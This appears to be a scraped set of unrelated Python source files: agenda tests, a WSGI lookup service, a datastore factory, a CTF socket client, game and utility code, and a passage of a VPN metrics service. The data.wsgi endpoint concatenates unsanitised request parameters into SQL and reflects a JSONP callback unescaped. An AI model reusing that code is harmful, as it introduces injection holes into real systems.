lunch\n# 2013.12.1 13:00 14:00 | Sunday brunch\n# 2013.12.2 08:00 15:00 | Long long meeting\n# 2013.12.2 15:00 16:00 | Coffee after the meeting\"\"\"\n# keiko_ag = Agenda.from_file(io.StringIO(keiko_agtxt))\n\n# # Torture test for normalization\n# day_in_life_agtxt = \"\"\"\n# # A torture-test agenda. I am seeing a lot of code \n# # that may not work well with sequences of three or more\n# # appointments that need to be merged. Here's an agenda\n# # with such a sequence. Also some Beatles lyrics that have\n# # been running through my head. \n# # \n# 2013.11.26 09:00 10:30 | got up\n# 2013.11.26 10:00 11:30 | got out of bed\n# 2013.11.26 11:00 12:30 | drug a comb across my head\n# 2013.11.26 12:00 13:30 | on the way down stairs I had a smoke\n# 2013.11.26 13:00 14:30 | and somebody spoke\n# 2013.11.26 14:00 15:30 | and I went into a dream\n# #\n# # A gap here, from 15:30 to 17:00\n# # \n# 2013.11.26 17:00 18:30 | he blew his mind out in a car\n# 2013.11.26 18:00 19:30 | hadn't noticed that the lights had changed\n# 2013.11.26 19:00 20:30 | a crowd of people stood and stared\n# #\n# # A gap here, from 20:30 to 21:00\n# #\n# 2013.11.26 21:00 22:30 | they'd seen his face before\n# 2013.11.26 22:00 23:00 | nobody was really sure ...\"\"\"\n# day_in_life = Agenda.from_file(io.StringIO(day_in_life_agtxt))\n# day_in_life.normalize()\n# # How are we going to test this? I want to ignore the text descriptions.\n# # Defined __eq__ method in Agenda just for this\n# should_be_txt = \"\"\"\n# 2013.11.26 09:00 15:30 | I read the news today oh, boy\n# 2013.11.26 17:00 20:30 | about a lucky man who made the grade\n# 2013.11.26 21:00 23:00 | and though the news was rather sad\n# \"\"\"\n# should_be_ag = Agenda.from_file(io.StringIO(should_be_txt))\n# testEQ(\"Torture test normalized\",day_in_life,should_be_ag)\n\n# # Start with the simplest cases of \"complement\"\n# simple_agtxt = \"\"\"2013.12.01 12:00 14:00 | long lunch\"\"\"\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n \n# # Different day - should have no effect\n# tomorrow = Appt.from_string(\"\"\"2013.12.02 11:00 15:00 | tomorrow\"\"\")\n# simple_ag = simple_ag.complement(tomorrow)\n# testEQ(\"Yesterday's appts don't matter\",str(simple_ag).strip(),\n# \"\"\"2013.12.02 11:00 15:00 | tomorrow\"\"\")\n# # And the freeblock should not be altered\n# testEQ(\"Not clobber freeblock\",str(tomorrow),\n# \"\"\"2013.12.02 11:00 15:00 | tomorrow\"\"\")\n \n# # Freeblock completely covered\n# simple_agtxt = \"\"\"2013.12.01 12:00 14:00 | long lunch\"\"\"\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# lunch = Appt.from_string(\"\"\"2013.12.01 12:30 13:30 | lunch\"\"\")\n# simple_ag = simple_ag.complement(lunch)\n# testEQ(\"Completely blocked freeblock\",str(simple_ag).strip(),\"\")\n# # And the freeblock should not be altered\n# testEQ(\"Not clobber freeblock 2\",str(lunch),\n# \"\"\"2013.12.01 12:30 13:30 | lunch\"\"\")\n \n# # Freeblock different times same day\n# simple_agtxt = \"\"\"2013.12.01 12:00 14:00 | long lunch\"\"\"\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# dinner = Appt.from_string(\"\"\"2013.12.01 19:30 20:30 | dinner\"\"\")\n# simple_ag = simple_ag.complement(dinner)\n# testEQ(\"Freeblock later in day\",str(simple_ag).strip(),\n# \"\"\"2013.12.01 19:30 20:30 | dinner\"\"\")\n# #\n# # More complex agendas - try with two appointments\n# #\n# simple_agtxt = \"\"\"\n# 2013.12.01 9:00 11:00 | morning meeting\n# 2013.12.01 13:00 14:00 | afternoon meeting\"\"\"\n# # Cover first part first appt\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 08:30 09:30 | morning coffee\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers first appt start only\",\n# str(simple_ag).strip(), \"2013.12.01 08:30 09:00 | morning coffee\")\n# # Cover last part first appt\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 09:30 11:30 | morning coffee\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers first appt end only\",\n# str(simple_ag).strip(), \"2013.12.01 11:00 11:30 | morning coffee\")\n# # Cover first part second appt\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 12:30 13:30 | afternoon coffee\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers second appt start only\",\n# str(simple_ag).strip(), \"2013.12.01 12:30 13:00 | afternoon coffee\")\n# # Cover last part second appt\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 13:30 14:30 | afternoon coffee\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers second appt end only\",\n# str(simple_ag).strip(), \"2013.12.01 14:00 14:30 | afternoon coffee\")\n# # Cover middle part two appts\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 10:30 13:30 | mid-day\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers two appts and gap\",\n# str(simple_ag).strip(), \"2013.12.01 11:00 13:00 | mid-day\")\n# # Extend across two appts\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 08:00 15:00 | most of day\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock fully covers two appts and gap\",\n# str(simple_ag).strip(), \"2013.12.01 08:00 09:00 | most of day\" +\n# \"\\n\" + \"2013.12.01 11:00 13:00 | most of day\" + \n# \"\\n\" + \"2013.12.01 14:00 15:00 | most of day\")\n\n# if __name__ == \"__main__\":\n# selftest_appt()\n# selftest_agenda()\n# selftest2_agenda()\n \n\n \n \n \n \n \n","repo_name":"mahananaka/proj8-freetimes","sub_path":"agenda.py","file_name":"agenda.py","file_ext":"py","file_size_in_byte":23814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18896858721","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#table structure for this script to work:\n#CREATE TABLE my_lookup_table (\n#\tid serial PRIMARY KEY,\n#\tcode integer,\n#\tdescription text,\n#\tgeom_type integer NOT NULL,\n#\tcategory text,\n#\tCONSTRAINT \"uc_temakode\" UNIQUE (code, geom_type)\n#);\n#geom_type: 1=point, 2=line, 3=polygon\n#\n#required paramaters are table and gtype (geom_type), category and query are for filtering results, sample query\n#http://localhost/wsgi/data.wsgi?table=my_lookup_table&category=field>ype=2&query=1234\n\nimport re #regular expression support\nimport string #string manipulation support\nfrom webob import Request\nfrom webob import Response\nimport psycopg2 #PostgreSQL DB Connection\nimport psycopg2.extras #z.b. für named column indexes\nimport json\nimport sys\nimport os\n\n# append the Python path with the wsgi-directory\nqwcPath = os.path.dirname(__file__)\nif not qwcPath in sys.path:\n sys.path.append(qwcPath)\n\nimport qwc_connect\n\ndef application(environ, start_response):\n request = Request(environ)\n filt = [];\n\n table = request.params[\"table\"]\n gtype = request.params[\"gtype\"]\n categoryString = ''\n if \"category\" in request.params:\n categoryString = request.params[\"category\"]\n categoryString = categoryString.strip()\n \n queryString = ''\n if \"query\" in request.params:\n queryString = request.params[\"query\"]\n #strip away leading and trailing whitespaces\n queryString = queryString.strip()\n \n sql = \"\"\n errorText = ''\n data = ()\n\n #todo params check and sanitize\n #if \"filter\" in request.params:\n # filterString = request.params[\"filter\"]\n # if len(filterString) > 0:\n # #sanitize\n # if re.search(r\"[^A-Za-z,._]\", filterString):\n # print >> environ['wsgi.errors'], \"wrong input: %s\" % filterString\n # filt = [] # set empty to have no search table error returned\n # else:\n # filt.extend(filterString.split(','))\n\n sql += \"SELECT code, description FROM \" + table + \" WHERE geom_type=\"+gtype \n\n if categoryString:\n filt.extend(categoryString.split(','))\n filtLength = len(filt)\n\n #add single quotes\n for i in range(filtLength):\n filt[i] = \"'\"+filt[i]+\"'\"\n\n sql += \" AND category IN(\"+','.join(filt)+\")\" \n \n if queryString:\n #sql += \" AND (description ILIKE '%\"+query+\"%' OR code::text ILIKE '%\"+query+\"%')\"\n sql += \" AND (description ILIKE %s\"\n data += (\"%\" + queryString + \"%\",)\n sql += \" OR code::text ILIKE %s)\"\n data += (\"%\" + queryString + \"%\",)\n\n sql += \" ORDER BY code;\"\n\n #return [sql]\n\n conn = qwc_connect.getConnection(environ, start_response)\n \n if conn == None:\n return [\"\"]\n\n cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n try:\n cur.execute(sql, data)\n except:\n exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()\n conn.close()\n errorText += 'error: could not execute query'\n # write the error message to the error.log\n print >> environ['wsgi.errors'], \"%s\" % errorText+\": \"+str(exceptionValue)\n response_headers = [('Content-type', 'text/plain; charset=utf-8'),\n ('Content-Length', str(len(errorText)))]\n start_response('500 INTERNAL SERVER ERROR', response_headers)\n\n return [errorText]\n\n rowData = [];\n rows = cur.fetchall()\n \n resultString = '{\"results\": '+json.dumps(rows)+'}'\n #resultString = string.replace(resultString,'\"bbox\": \"[','\"bbox\": [')\n #resultString = string.replace(resultString,']\",','],')\n\n #we need to add the name of the callback function if the parameter was specified\n if \"cb\" in request.params:\n resultString = request.params[\"cb\"] + '(' + resultString + ')'\n\n response = Response(resultString,\"200 OK\",[(\"Content-type\",\"text/plain; charset=utf-8\"),(\"Content-length\", str(len(resultString)) )])\n\n conn.close()\n\n return response(environ, start_response)\n\n\n","repo_name":"petunjiaj/gisapp","sub_path":"client/wsgi/data.wsgi","file_name":"data.wsgi","file_ext":"wsgi","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"72310875680","text":"#!/usr/bin/python\n# See LICENSE file\n\nimport imp\nimport os\nimport sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../lib/\"))\nimport constants\n\nDATASTORE_DIR= \"%s/AppDB\" % constants.APPSCALE_HOME\n\nclass DatastoreFactory:\n\n @classmethod\n def getDatastore(cls, d_type):\n \"\"\" Returns a reference for the datastore. Validates where \n the <datastore>_interface.py is and adds that path to \n the system path.\n \n Args: \n d_type: The name of the datastore (ex: cassandra)\n \"\"\"\n\n datastore = None\n mod_path = DATASTORE_DIR + \"/\" + d_type + \"/\" + d_type + \"_interface.py\"\n\n if not os.path.exists(mod_path):\n raise Exception('{} does not exist'.format(mod_path))\n\n sys.path.append(DATASTORE_DIR + \"/\" + d_type)\n module_name = '{}_interface'.format(d_type)\n handle, path, description = imp.find_module(module_name)\n\n try:\n d_mod = imp.load_module(module_name, handle, path, description)\n datastore = d_mod.DatastoreProxy()\n finally:\n if handle:\n handle.close()\n\n return datastore\n\n @classmethod\n def valid_datastores(cls):\n \"\"\" Returns a list of directories where the datastore code is\n \n Returns: Directory list \n \"\"\"\n\n dblist = os.listdir(DATASTORE_DIR)\n return dblist\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/AppScale/appscale/AppDB/appscale_datastore_batch.py","file_name":"appscale_datastore_batch.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37759999516","text":"\"\"\"\nWrite a Python script, this script should:\n1.\tconnect to this CTF game's ip and on port 20001.\n2.\tafter you connect to it, receive the prompt.\n3.\trespond to it to receive your flag.\n\"\"\"\n\n#!/usr/bin/python # This is client.py file\nimport socket # Import socket module\ns = socket.socket() # Create a socket object\nhost = '1.2.3.4' # Remote Server IP\nport = 20001 # Remote Server Port\ns.connect((host, port))\nprint (s.recv(1024))\ns.send(str.encode('Gimme flag pls'))\nprint (s.recv(1024))\ns.close() # Close the socket when done\n\n\n","repo_name":"Sambsamb/INF601b","sub_path":"CTF1-ListenPort.py","file_name":"CTF1-ListenPort.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38474369240","text":"from __future__ import print_function\n\nfrom setuptools import setup, find_packages, Command\nimport io\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\ndescription = ('GOparser - A Python Framework for Working with Gene Ontology '\n '(GO) Terms and Annotations')\nversion = '1.2rc1'\n\nwith io.open(os.path.join(here, 'README.rst'), encoding='UTF-8') as fh:\n long_description = fh.read()\n\ninstall_requires = [\n 'future >= 0.15.2, < 1',\n 'six >= 1.10.0, < 2',\n 'unicodecsv >= 0.14.1, < 1',\n]\n\n# do not require installation if built by ReadTheDocs\n# (we mock these modules in docs/source/conf.py)\nif 'READTHEDOCS' not in os.environ or \\\n os.environ['READTHEDOCS'] != 'True':\n install_requires.extend([\n 'genometools >= 2.0rc1, < 3',\n ])\n\n\nclass CleanCommand(Command):\n \"\"\"Removes files generated by setuptools.\n\n \"\"\"\n # see https://github.com/trigger/trigger/blob/develop/setup.py\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n error_msg = 'You must run this command in the package root!'\n assert os.getcwd() == here, error_msg\n os.system('rm -rf ./dist ./build ./*.egg-info ')\n\nsetup(\n name='goparser',\n\n version=version,\n\n description=description,\n long_description=long_description,\n\n # homepage\n url='https://github.com/flo-compbio/goparser',\n\n author='Florian Wagner',\n author_email='florian.wagner@duke.edu',\n\n license='GPLv3',\n\n # see https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 3 - Alpha',\n\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n\n 'Programming Language :: Python :: 2.7',\n ],\n\n # What does your project relate to?\n keywords='gene ontology biology bioinformatics',\n\n # packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n # packages=['goparser'],\n packages=find_packages(exclude=['docs', 'tests*']),\n\n install_requires=install_requires,\n\n # development dependencies\n extras_require={\n 'docs': ['sphinx', 'sphinx_rtd_theme']\n },\n\n # data\n # package_data={\n # },\n\n # data outside package\n # data_files=[('my_data', ['data/data_file'])],\n\n # executable scripts\n # entry_points={\n # 'console_scripts': []\n # },\n\n cmdclass={\n 'clean': CleanCommand,\n },\n)\n","repo_name":"flo-compbio/goparser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"12673662078","text":"from pymongo import MongoClient\nimport requests\nimport json\n\nclient = MongoClient('mongodb://localhost:27017/')\ndb = client.var_hub\n\ndef download_patients():\n patients = db.patients\n\n if patients.count_documents({}) == 0:\n patients_ids = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients\").json()\n for id in patients_ids:\n patient = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients/\" + id).json()\n patients.insert_one(patient)\n\ndef download_plans():\n plans = db.plans\n\n if plans.count_documents({}) == 0:\n patients_ids = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients\").json()\n for id in patients_ids:\n plans_ids = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients/\" + id + \"/plans\").json()\n for plan_id in plans_ids:\n plan = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients/\" + id + \"/plans/\" + plan_id).json()\n plans.insert_one(plan)\n\ndef get_patients():\n return db.patients.find({})\n\ndef get_patient(id):\n return db.patients.find_one({'Id': id})\n\ndef get_patient_plans_ids(id):\n return [plan['Id'] for plan in db.patients.find_one({'Id': id})['Plans']]\n\ndef put_test_to_db():\n tests = db.tests\n if tests.count_documents({}) == 0:\n with open('tests.json', 'r') as infile:\n data = json.loads(infile.read())\n for datum in data:\n if isinstance(datum, dict):\n tests.insert_many(datum)\n\ndef download():\n put_test_to_db()\n download_patients()\n download_plans()","repo_name":"pw94/VarHub","sub_path":"data_downloader.py","file_name":"data_downloader.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40185268485","text":"import pygame\n\n#Class for creating input boxes\nclass InputBox:\n\n def __init__(self, width, height, x, y, text=''):\n self.COLOR_INACTIVE = pygame.Color((1, 110, 95))\n self.COLOR_ACTIVE = pygame.Color((138, 255, 243))\n self.surf = pygame.Surface((width, height))\n self.FONT = pygame.font.Font('./Font/pixelated.ttf', int(height/2))\n self.rect = pygame.Rect(x, y, width, height)\n self.surf.fill((71,222,207))\n self.color = self.COLOR_INACTIVE\n self.text = text\n self.txt_surface = self.FONT.render(text, True, self.color)\n self.active = False\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n if self.rect.collidepoint(event.pos):\n # Toggle the active variable.\n self.active = not self.active\n else:\n self.active = False\n # Change the current color of the input box.\n self.color = self.COLOR_ACTIVE if self.active else self.COLOR_INACTIVE\n if event.type == pygame.KEYDOWN:\n if self.active:\n if event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n self.text += event.unicode\n # Re-render the text.\n self.txt_surface = self.FONT.render(self.text, True, self.color)\n\n\n def draw(self, screen):\n # Blit the text.\n screen.blit(self.surf, (self.rect.x, self.rect.y))\n screen.blit(self.txt_surface, (self.rect.x+5, self.rect.y+5))\n # Blit the rect.\n pygame.draw.rect(screen, self.color, self.rect, 2)\n\n def getText(self):\n return self.text","repo_name":"mjausmanis/Farkle","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35169429923","text":"#!/usr/bin/env python3\n\n\ndef copy_board(board):\n return [x[:] for x in board]\n\ndef convert2d(num):\n i = (num - 1) // 3\n j = (num - 1) % 3\n return i,j\n\ndef minimax(board, turn, index):\n endgame, winner = game_over(board)\n #reached terminal node, return score\n if endgame:\n if winner == 'O':\n return 1\n elif winner == 'X':\n return -1\n else:\n return 0\n #expand nodes\n children = []\n new_positions = []\n cur_score = 0\n scores = []\n for i in range(3):\n for j in range(3):\n if board[i][j] == ' ':\n temp = copy_board(board)\n temp[i][j] = turn\n children.append(temp)\n new_positions.append([i,j])\n\n #set next turn\n next_turn = ''\n if turn == 'X':\n next_turn = 'O'\n else:\n next_turn = 'X'\n\n #recurse\n for i in range(len(children)):\n temp_score = minimax(children[i], next_turn, index)\n scores.append(temp_score)\n\n #get max score if on max turn, vice versa\n if turn == 'X':\n cur_score = min(scores)\n cur_score_ind = scores.index(cur_score)\n else:\n cur_score = max(scores)\n cur_score_ind = scores.index(cur_score)\n\n #set position of best move\n index[0] = new_positions[cur_score_ind][0]\n index[1] = new_positions[cur_score_ind][1]\n\n return cur_score\n\n\n\ndef player_turn(board):\n x = ''\n i = 0\n j = 0\n while True:\n test = input(\"Enter X position (1-9): \")\n try:\n x = int(test)\n except ValueError:\n print(\"invalid input!\")\n continue\n\n i,j = convert2d(x)\n\n if (x > 9 or x < 1):\n print(\"Valid positions are #1-9.\")\n continue\n elif (board[i][j] != ' '):\n print(\"Position already taken.\")\n continue\n else:\n board[i][j] = 'X'\n break\n return\n\ndef cpu_turn(board):\n pos = [0,0]\n minimax(board, 'O', pos)\n board[pos[0]][pos[1]] = 'O'\n return\n\ndef game_over(board):\n game_over = False\n draw = True\n winner = ''\n\n #check draw\n for i in range(3):\n for j in range(3):\n if board[i][j] == ' ':\n draw = False\n if draw is True:\n game_over = True\n\n #check horizontals\n for x in board:\n if (x[0] == x[1] == x[2] == 'X'):\n winner = 'X'\n game_over = True\n elif (x[0] == x[1] == x[2] == 'O'):\n winner = 'O'\n game_over = True\n\n #check verticals\n for x in range(3):\n if (board[0][x] == board[1][x] == board[2][x] == 'X'):\n winner = 'X'\n game_over = True\n elif (board[0][x] == board[1][x] == board[2][x] == 'O'):\n winner = 'O'\n game_over = True\n\n #check diagonals\n if (board[0][0] == board[1][1] == board[2][2] == 'X'):\n winner = 'X'\n game_over = True\n elif (board[0][0] == board[1][1] == board[2][2] == 'O'):\n winner = 'O'\n game_over = True\n elif (board[2][0] == board[1][1] == board[0][2] == 'O'):\n winner = 'O'\n game_over = True\n elif (board[2][0] == board[1][1] == board[0][2] == 'X'):\n winner = 'X'\n game_over = True\n\n return game_over, winner\n\n\n\ndef print_board(board):\n print(' ', board[0][0], \"|\", board[0][1], \"|\", board[0][2])\n print(\" -----------\")\n print(' ', board[1][0], \"|\", board[1][1], \"|\", board[1][2])\n print(\" -----------\")\n print(' ', board[2][0], \"|\", board[2][1], \"|\", board[2][2])\n\ndef main():\n turn = 0\n board = [[' ',' ',' '],\n [' ',' ',' '],\n [' ',' ',' ']]\n while not game_over(board)[0]:\n if (turn % 2 == 0):\n print_board(board)\n player_turn(board)\n else:\n cpu_turn(board)\n turn += 1\n\n if (game_over(board)[1] != ''):\n print_board(board)\n print(\"~~~ \", game_over(board)[1], \" wins! ~~~\")\n elif (game_over(board)[1] == ''):\n print_board(board)\n print(\"--- It's a Draw! ---\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tshiels/minimax_tictactoe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74318606562","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Posts', '0003_post_font_board'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='post',\n old_name='font_board',\n new_name='front_board',\n ),\n ]\n","repo_name":"GitYCC/django_ycnote","sub_path":"YCBlog/Posts/migrations/0004_auto_20170320_0834.py","file_name":"0004_auto_20170320_0834.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43156395006","text":"import json, random\n\nfrom helpers import addProbability, testProbabilities, getProbableTag, buildDataModels\n\n\ndef buildTagParagraph(dataDict, wordCount, seedWord):\n\tcurKey = seedWord\n\n\tdef toKey(keyTuple):\n\t\treturn ' '.join(keyTuple)\n\n\t# print(\"seed='%s'\" % (toKey(curKey), ))\n\t\n\ttagParagraph = []\n\twhile(len(tagParagraph) < wordCount):\n\t\t# print(\"curKey='%s'\" % (toKey(curKey), ))\n\t\twordList = dataDict[toKey(curKey)]\n\t\t# print(wordList)\n\t\t# print(':' + str(wordList))\n\t\t# curKey = random.choice(wordList)[1]\n\t\tval = random.random()\n\t\tcurKey.append(getProbableTag(val, wordList)[1])\n\t\tcurKey = curKey[1:]\n\t\ttagParagraph.append(toKey(curKey))\n\n\treturn tagParagraph\n\ndef buildParagraph(tagParagraph, tagToWordDict):\n\tparagraph = []\n\tfor tags in tagParagraph:\n\t\t# for tag in tags.split():\n\t\ttagssplit = tags.split()\n\t\ttag = \"\"\n\t\tif(len(tagssplit) > 1):\n\t\t\ttag = tagssplit[1]\n\t\telse:\n\t\t\ttag = tagssplit[0]\n\t\tval = random.random()\n\t\tword = getProbableTag(val, tagToWordDict[tag])\n\t\tparagraph.append(word[1])\n\treturn paragraph\n\ndef run(ngram, tag2word, seed):\n\t(dataDict, tagToWordDict) = buildDataModels(ngram, tag2word, seed)\n\n\ttagParagraph = buildTagParagraph(dataDict, 100, seedWord=seed)\n\n\n\n\tparagraph = buildParagraph(tagParagraph, tagToWordDict)\n\tprint(' '.join(paragraph))\n\ndef main():\n\t# run('data/poem_unigram.json', 'data/poem_tag_to_word.json', [\"\"])\n\trun('data/at_bigram.json', 'data/at_tag_to_word.json', [\"\", \"\"])\n\nif __name__ == '__main__':\n\tmain()","repo_name":"camhart/cs470_pos_tagging","sub_path":"ngramparagraph.py","file_name":"ngramparagraph.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20211940540","text":"\"\"\"dVPN Metric Service to collect, store and retrieve dApp metrics\"\"\"\n\nfrom datetime import datetime, timedelta\n\nfrom ..interfaces import AbstractGlobalMetricService\n\nclass VPNMetricService(AbstractGlobalMetricService):\n\tdata_prefix = 'vpn'\n\tintervals = {\n\t\t'hourly': 3600,\n\t\t'daily': 3600*24\n\t}\n\n\tdef __init__(self, config, logger, metric_repository, mnsync_service, mn_gateway):\n\t\t\"\"\" Constructor \"\"\"\n\t\tself.config = config\n\t\tself.logger = logger\n\t\tself.repo = metric_repository\n\t\tself.mnsync_service = mnsync_service\n\t\tself.mn_gateway = mn_gateway\n\n\tdef get_recent_metrics(self, interval_name):\n\t\t\"\"\" Retrieves metrics for the last specified time interval \"\"\"\n\t\tself._assert_interval_supported(interval_name)\n\t\t\n\t\tnow = datetime.now()\n\n\t\tif interval_name == 'hourly':\n\t\t\tkey_timeformat = \"hourly:%m-%d_%H\"\n\t\t\tlast_time = now - timedelta(hours=1)\n\t\t\tlast_time_since = last_time - timedelta(hours=1)\n\t\telif interval_name == 'daily':\n\t\t\tkey_timeformat = \"daily:%m-%d\"\n\t\t\tlast_time = now - timedelta(days=1)\n\t\t\tlast_time_since = last_time - timedelta(days=1)\n\t\telse:\n\t\t\treturn {}\t# this should not happen\n\n\t\tlast_metrics_key = '{}:{}'.format(self.data_prefix, last_time.strftime(key_timeformat))\n\n\t\tif not self.repo.exists(last_metrics_key):\n\t\t\tself.logger.info('VPNMetricService::get_recent_metrics: No recent metrics in database for interval ' + interval_name)\n\t\t\treturn {}\n\n\t\treturn self.repo.get(last_metrics_key)\n\n\n\tdef update_recent_metrics(self, interval_name):\n\t\t\"\"\" Calculates and updates metrics for the last specified time interval \"\"\"\n\t\tself._assert_interval_supported(interval_name)\n\t\t\n\t\tnow = datetime.now()\n\n\t\tif interval_name == 'hourly':\n\t\t\tkey_timeformat = \"hourly:%m-%d_%H\"\n\t\t\tprev_time = now - timedelta(hours=1)\n\t\telif interval_name == 'daily':\n\t\t\tkey_timeformat = \"daily:%m-%d\"\n\t\t\tprev_time = now - timedelta(days=1)\n\t\telse:\n\t\t\tself.logger.debug('VPNMetricService::update_recent_metrics: No action for interval ' + interval_name)\n\t\t\treturn\n\n\t\tprev_metrics_key = '{}:{}'.format(self.data_prefix, prev_time.strftime(key_timeformat))\n\t\tcur_metrics_key = '{}:{}'.format(self.data_prefix, now.strftime(key_timeformat))\n\t\tcur_metrics_state = self._get_current_metrics()\n\n\t\tif self.repo.exists(cur_metrics_key + ':state'):\n\t\t\tself.logger.info('VPNMetricService::update_recent_metrics: Metrics state already saved for interval ' + interval_name)\n\t\t\treturn\n\n\t\tself.repo.store(cur_metrics_key + ':state', cur_metrics_state)\n\n\t\tif self.repo.exists(prev_metrics_key + ':state'):\n\t\t\tprev_metrics_state = self.repo.get(prev_metrics_key + ':state')\n\n\t\telse:\n\t\t\tself.logger.debug('VPNMetricService::update_recent_metrics: No previous metric records found for interval ' + interval_name)\n\t\t\treturn\n\n\t\tself.repo.store(cur_metrics_key, {\n\t\t\t'interval_since': prev_time.isoformat().split('.')[0],\t# remove miliseconds\n\t\t\t'interval_until': now.isoformat().split('.')[0],\n\t\t\t**self._compare_metrics(prev_metrics_state, cur_metrics_state)\n\t\t\t})\n\n\tdef get_global_metrics(self, interval_name):\n\t\t\"\"\" Retrieves global metrics for the last specified time interval \"\"\"\n\t\tself._assert_interval_supported(interval_name, exclude=[\"hourly\"])\n\n\t\tnow = datetime.now()\n\t\tyesterday = now - timedelta(days=1)\n\t\tmetrics_key = 'global:daily:{}:{}'.format(self.data_prefix, yesterday.strftime(\"%m-%d\"))\n\n\t\tif not self.repo.exists(metrics_key):\n\t\t\tself.logger.info('VPNMetricService::get_global_metrics: No recent metrics in database for interval ' + interval_name)\n\t\t\treturn {}\n\n\t\treturn self.repo.get(metrics_key)\n\n\tdef update_global_metrics(self, interval_name):\n\t\t\"\"\" Updates global metrics from all the masternodes, could be time consuming\"\"\"\n\t\tself._assert_interval_supported(interval_name, exclude=[\"hourly\"])\n\n\t\tnow = datetime.now()\n\t\tyesterday = now - timedelta(days=1)\n\t\tmetrics_key = 'global:daily:{}:{}'.format(self.data_prefix, yesterday.strftime(\"%m-%d\"))\n\n\t\tif self.repo.exists(metrics_key):\n\t\t\tself.logger.info('VPNMetricService::update_global_metrics: Found already existing metrics in database for interval ' + interval_name)\n\t\t\treturn\n\n\t\tself.repo.store(metrics_key, {\n\t\t\t'interval_since': yesterday.isoformat().split('.')[0],\t# remove miliseconds\n\t\t\t'interval_until': now.isoformat().split('.')[0],\n\t\t\t**self._collect_global_metrics(interval_name)\n\t\t\t})\n\n\n\t# Private methods\n\tdef _get_current_metrics(self):\n\t\t\"\"\"Returns current dVPN metric state, as per OS internal counter\"\"\"\n\t\tinterface = self.config['dapps.vpn'].get('tun_interface', 'tun1')\n\t\tbytes_in, bytes_out = self._get_network_bytes(interface)\n\t\treturn { 'bytes_in': bytes_in, 'bytes_out': bytes_out}\n\n\tdef _compare_metrics(self, previous_metrics, current_metrics):\n\t\t\"\"\"Returns delta of two dVPN metric states, eg. of both components bytes_in and bytes_out\"\"\"\n\t\ttry:\n\t\t\tif current_metrics['bytes_in'] < previous_metrics['bytes_in'] or current_metrics['bytes_out'] < 